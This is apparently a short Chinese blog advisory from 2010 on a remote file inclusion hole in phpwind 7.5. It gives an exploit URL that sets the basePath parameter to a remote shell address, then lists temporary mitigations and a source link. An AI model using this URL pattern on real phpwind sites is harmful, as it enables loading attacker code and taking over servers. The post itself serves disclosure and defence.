phpwind 7.5论坛程序漏洞与0day

2010年1月23日星期六 | | |

  提示:内容中所含EXP、攻击测试代码不可用于非法用途,仅供安全人士参考

漏洞说明:
程序basePath参数引发的文件包含漏洞
利用方法:
http://www.xxx.com/apps/groups/index.php?route=groups&basePath=shell地址
临时解决方法:
1.将basePath进行过滤
   如果过滤的代码包括:http,/,%
2.关闭apps引用模块
信息来源: http://www.tosec.cn/bug/7213.html
 
我的QQ空间
SafeCms <= 2.0.1.0 Beta Cross Site Scripting
SSV ID:15203发布时间:2010-01-07测试方法:[www.sebug.net]本站...
 

0 评论:

发表评论

订阅: 博文评论 (Atom)

所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]

 
Glossy Blue by N.Design Studio
Blogger Templates by Blogcrowds | Glossy Blue Blogger Template